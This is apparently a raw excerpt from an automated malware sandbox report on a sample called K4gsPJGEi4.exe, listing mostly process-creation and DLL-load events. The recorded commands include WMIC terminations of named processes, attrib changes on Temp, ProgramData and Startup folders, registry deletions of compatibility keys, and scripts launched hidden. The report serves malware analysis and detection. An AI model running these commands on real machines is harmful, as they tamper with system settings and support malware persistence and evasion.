                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%IntelSvc.exe%'" Call Terminate
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%Systemfont.exe%'" Call Terminate
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call Terminate
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call Terminate
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\*.*"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\*.*"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*"
                            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Start.cmd" "Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe C:\Windows\System32\find.exe "0x0" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c type "C:\Users\user\AppData\Local\Temp\Start.cmd"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Vnoad.vbs" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\est1.cmd" Jump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\two.cmd" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screen.exe "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe C:\Windows\System32\findstr.exe /i /c:"Local" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe C:\Windows\System32\findstr.exe /i /c:"'" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screen.exe "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i /c:"RtkAudio"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i /c:"RtkAudio"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: urlmon.dllJump to behavior
